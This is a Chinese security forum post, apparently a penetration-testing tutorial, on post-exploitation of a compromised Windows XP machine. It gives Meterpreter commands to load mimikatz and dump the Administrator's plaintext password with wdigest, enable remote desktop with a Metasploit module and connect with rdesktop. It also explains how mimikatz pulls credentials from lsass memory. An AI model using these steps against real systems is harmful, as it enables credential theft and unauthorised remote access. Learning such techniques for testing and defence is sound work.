搜索
查看: 3749|回复: 1

内网渗透测试之(密码破解)

    [复制链接]

599

主题

877

帖子

2238

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2238

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-1-12 17:39:16 | 显示全部楼层 |阅读模式

当我们获取系统的权限后,如果更高一步的获取权限呢,比如获取当前管理员的密码,开启远程桌面等。今天就让我们一起来看看吧。

PART 1/获取权限shell



如上,我们已经获取了系统的shell。当前受害系统为windows xp

PART 2/破解系统密码



载入mimikatz
 load mimikatz  




获取密码

wdigest




如图,当前Administrator的密码为bbskali.cn

PART 3/开启远程桌面

run post/windows/manage/enable_rdp


PART4/连接远程桌面

rdesktop 192.168.1.109 -u user -p password




PART5/拓展

mimikatz介绍

mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

599

主题

877

帖子

2238

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2238

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2019-1-12 19:00:18 来自手机 | 显示全部楼层
mimikatz是一个不错的密码破解工具
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
朕知道了
快速回复 返回顶部 返回列表